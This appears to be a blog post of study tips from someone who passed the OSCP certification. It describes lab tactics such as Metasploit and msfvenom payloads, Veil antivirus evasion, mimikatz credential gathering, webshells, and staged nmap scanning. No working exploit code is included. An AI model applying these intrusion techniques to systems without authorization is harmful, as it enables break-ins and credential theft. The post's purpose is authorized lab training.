This is the third in a series of posts about the OSCP certification and my journey to acquire it. This post is focused primarily on things I did that helped me to succeed.
Something to get out of the way right off:
I can't talk solutions to lab machines or exam targets! I will not give them to you, so don't ask!
Still, over time here is what I found most useful in passing PWK. These entries are in no way comprehensive. They're simply what sticks out to me the most, thinking about and examining my notes.
VMs for compiling exploit code
A common forum issue is compilation issues for Linux (and Windows to a lesser extent) privilege escalation binaries. Especially now that OffSec is using a Kali 2-based VM for students, which uses a much newer kernel and associated glibc than the previous 1.x release, which itself is much newer than the lab targets I ran into.
You can generally mitigate compilation issues (such as segfaults on the target) by being familiar with
gcc flags. However, I preferred to simply route around the problem by using older Linux versions to compile exploit code.
I set up a CentOS 5 VM (actually two, one 32 bit and one 64 bit) in Xenserver and did all of my compile work there. I never had to fuss with special flags or anything like that, all the code just compiled and ran.
If you're already knowledgeable about the
gcc flags and settings you're probably laughing at me, but hey, I took the path of least resistance!
Being proficient at working with VMs is a good thing in general though, simply for being able to stand up new instances to play with interesting new software or just as test targets. Don't forget about Vulnhub either; while most of the time they recommend VirtualBox to host a VM, most of them work fine in Xenserver or VMWare if you know how to import the the files.
Gitlab for engagement organization
I'm a big fan of Gitlab, a open source clone of GitHub. With a code and file repository, wiki module, issue tracker and numerous other features, it's what 0meta uses to track information during an engagement. There are other bespoke tools for this exact purpose out there, such as Faraday and Dradis. However, they both suffer a fair bit of the "open core" model where some decent stuff is free software...and the rest is not. I'm very picky about this sort of thing personally, and tend to dislike it unless the proprietary bits truly are only enterprise oriented.
Gitlab does have an enterprise version, but the vast majority of features are freely available in the community edition. I've been using it for years, it's rapidly updated, responsive to security CVEs, and pretty easy to set up at this point.
git into a penetration tester's workflow is something I might talk about at a later time, but I use it to set up the 'skeleton' of the engagement as well as keeping all the files synchronized. I use the issue tracker for notating differing phases of the engagement, the wiki for holding bulk notes, and the repo itself for the artifacts and loot.
The PWK course does a decent job of introducing the Metasploit Framework and the
msfvenom tool. I mentioned it elsewhere but I would strongly recommend being very apt at using all of the tools and modules the MSF provides you. The
post modules in particular are great once you have a session up and running. I replaced nearly all of my exploit-db exploit payloads with a meterpreter binary, and did 80%+ of my work with it.
The transition from using the coursework tools like
ncat early on in the lab to using
mimikatz (through the post/windows/gather/credentials/sso module) and meterpreter sessions correlated directly with my rapid increase in exploit 'rate.' This reflected my refinement in process as I moved forward.
I still understood non-MSF exploit code, and I didn't neglect changing exploit code when it suited my purposes. But if there was an
exploit module for my lab target, I took it.
msfvenom, just remember that it outputs more than just C/Python shellcode. WAR files, PHP and perl were all modes of output that I used. In particular with PHP, I found it most useful to remove extraneous linebreaks and such with
sed, as it seemed like some web applications executed scripts more reliably then. Don't forget that the PHP output lacks the actual PHP tags at the beginning and end! Also pay attention to the use of single and double quotes inside, because they might be canceled or messed up by quotes that appear outside of the shellcode snippet.
I found Veil because one lab host had some files on a webserver that suggested that anti-virus might be a concern when contemplating payload selection.
The labs don't have much AV presence overall, but I think that is an emphasis in the Cracking the Perimeter course, and thus is more or less intentional. It turns out that the AV on this host, from a prominent software vendor, didn't seem to care about even a naked meterpreter binary, much less the Veil file that I used at first.
Using Veil was a bit different than what I was expecting. Veil is both a tool for creating payloads to evade signature-based AV, and a tool to deliver said payloads if you happen to have remote execution on the host already through pass-the-hash.
More than once I ran into text that had been obfuscated by base64 encoding it. There is a
base64 binary available on the terminal, and also websites that handle conversions. Look for tale-tell signs like padding '=' characters.
There are all sorts of little directories in Kali with interesting things in them. I remember stumbling on a cache of webshells in one location after several weeks in the lab. It would have saved me a fair bit of time looking for good ones online, had I known. I don't have a Kali instance in front of me, but I think it was
/usr/share/webshells. Have a look around and see if there's anything else!
Turn PHP off
In Kali, the Apache web server is configured with PHP, and the server-side scripting is enabled. This can cause confusion when trying to run RFI against a lab target, and finding your script actually executes against your own server instead of being served to the target.
nmap and you
nmap, and so should you, but please don't nuke a target host or network with every scan parameter and script under the sun.
Your scans should start off narrow and light. Use the
--top-ports option with a relatively small number, like 100. Do the same with UDP. You don't even need to start off with
V, since knowing every single thing about the host isn't what you're going for early on.
Based on those results, expand your scans. Keep version and banner grabbing to services you've discovered are open. Everything filtered or closed? If you're already suspicious of the host and other recon suggests it, then you can even scan for some of the more exotic protocols
nmap allows for.
If a service won't reveal anything about itself, or
nmap is confused about the "fingerprint," you can often learn something by attaching with telnet, ncat/socat, visiting with a web browser, or just use
curl if you like.
There is one host in the labs that does react to being aggressively scanned with
nmap. Using the
-T switch with a 1 or 2, and keeping the ports narrowly defined helps a great deal. Practice and see how aggressive you can be before the host reacts!
Finally, be careful with scripts. There are a ton of them, and you should choose what you're using explicitly. I kept a terminal window open that sat in
/usr/share/nmap/scripts/ and would grep for scripts that might be relevant based on the services that I discovered with primary scans. Running scripts willy-nilly wastes time and makes you noisy. At worst you can run something unsafe that can crash a service!
The two hands, upload and execution
If you've ever seen one of those enclosed vacuum workspaces where a human operator puts their hands inside two "gloves" built into the side of the container and manipulates things with them, you have a bit of an idea what it's like popping a host.
What you're aiming to accomplish is getting code you control on the host, and then executing that code. Sometimes, this is one in the same action, like remote buffer overflows or RFI, but often these are two discrete sequences.
For example, there were multiple lab hosts where I had to upload malicious code through one vector like a database, but executed that code with a completely different web application. Sometimes upload is through weak SSH credentials or upload facilities built into an application. Execution often involved scripting, or tricking an application into executing something it shouldn't, or normal execution from a location I controlled instead of where the application expected.
Breaching lab hosts is often figuring out the answers to the questions
"Where do I get code onto the box?"
"How do I get that code executed?"
That's a different question than the one students seem to jump to, which is "what exploit do I run against this host?"
Obviously, there are hosts where there are no vulnerable services. These often involved client attacks through a browser, or simply finding remote access credentials elsewhere.
Enumeration is usually about what's running, where, with what access controls. (Client-side is more who's visiting, with what, from where...)
To that end,
onesixtyone, and other scanning tools are only part of the process.
Don't overlook various places where really important indicators like version strings can hide. They may require you to poke around manually.
- viewing source HTML, looking for interesting things like version strings or paths to other resources
- purposefully going to a bad URL
- visiting an 'about' page
- have FTP read access to a huge swath of filesystem? Visit the program directories and see what's installed
- connect with ncat, telnet, etc, and get error codes or interesting responses and Google the strings
And so forth.
Exploit-db & Google
When I was enrolled, exploit-db wasn't using a captcha at all. OffSec has switched to a Google-based one that has you identify various things in images, which I'm pretty good at and almost never fail.
However, if those things drive you crazy, there's always google.
Just use a
site:exploit-db.com <search term>
And you can bypass having to deal with it. It's not flawless, but it's usually faster if you have a decent idea what you're looking for.
I know about
searchsploit, but I find its...search to be pretty poor. I usually had to engage in a lot of
greping and such to effectively narrow down results.
As an aside, MSF's search in the console is also pretty terrible. Maybe I should investigate using an ELK deployment with indices of MSF modules, hmm....
Test your exploits
Testing your exploit code, especially code you've had to modify for a new target, can be pretty tedious. But you absolutely cannot skip this step. Not if you want to be the best penetration tester you can be.
VMs, again, are very useful for quickly standing up an environment for doing this sort of work, be it in Windows or Linux. Trying out an exploit, especially one where you had to fiddle with it a little bit, gives you the chance to prevent dumb mistakes that in the real world could cost you an ingress point.
It's even worth mentioning that the same exploit, done a different way, can work better or more effectively. As an example, in the lab there are quite a few machines that are vulnerable to the iconic MS08-067 SMB RPC vulnerability. However, the MSF module for this exploit honestly wasn't very reliable against lab hosts, in my experience. Even after a revert, some of them were well less than 50% effective, and whether they worked or failed, they generally wrecked the SMB server and caused it to crash, meaning spending another revert. In the real world, this would be noisy and suspicious for any administrators paying attention.
This was annoying for me, so I looked around and there is a python version of the exploit that works in a very stable and repeatable way. Even if it failed, the SMB server service generally didn't completely crash. The script doesn't have the same targets, mind, (and I was too lazy to port the RETN addresses and such from the MSF module). I swapped the payload with a meterpreter binary and never used the exploit module again.
As a final note, exploit-db will often have a download of the vulnerable application as a part of the exploit page. Take advantage of this when doing research and testing for your target!
As an aside, you should definitely read this write-up from a Microsoft engineer of how the MS08-067 exploit was detected and patched. If you want to help out in defense/blueteam ops like I do, it's fascinating.
Students sometimes get so focused on popping boxes that they forget to have a look around once they have full access. OffSec leaves clues and critical information for exploiting certain hosts on other machines. Without this information, you cannot breach some hosts. Look in user directories, not just the administrator or root user. Look in bash_history files. Look at the version of installed applications like Adobe Reader or Internet Explorer. You don't have to immediately use the data, just store it away so that if you need a baseline version to aim an exploit at, you have it ready. Getting access to the domain controllers on the network starts with simple observation of little things like these.
That about wraps up this series. The OSCP is one of the most engaging and brutal intellectual exercises I have ever engaged in. I'm glad I was able to make it through to the end and Try Harder. It's not a perfect course, but I believe it to be one of a kind. It supports the foundation for a career that can take its holder in any number of different directions. If you read all of this and haven't been convinced of its merit, then place the blame on me and look closer for yourself. You won't regret it.